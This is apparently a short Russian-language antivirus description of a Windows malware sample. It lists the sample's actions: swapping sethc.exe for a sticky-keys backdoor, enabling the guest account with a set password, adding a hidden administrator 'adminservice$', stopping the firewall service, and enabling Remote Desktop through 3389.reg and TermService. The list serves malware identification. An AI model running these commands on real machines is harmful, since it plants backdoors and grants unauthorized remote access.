Техническая информация
- <SYSTEM32>\sethc.exe
- <SYSTEM32>\dllcache\sethc.exe файлом <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\sethc.exe
- '<SYSTEM32>\net1.exe' user guest /active:yes
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' user guest 110120
- '%WINDIR%\regedit.exe' /s 3389.reg
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s guest /add
- '<SYSTEM32>\net1.exe' user adminservice$ 110120 /add
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\3389.bat""
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s adminservice$ /add
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start TermService
- <Текущая директория>\3389.reg
- %TEMP%\1.tmp\3389.bat
- %TEMP%\1.tmp\3389.bat
- <Текущая директория>\3389.reg
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'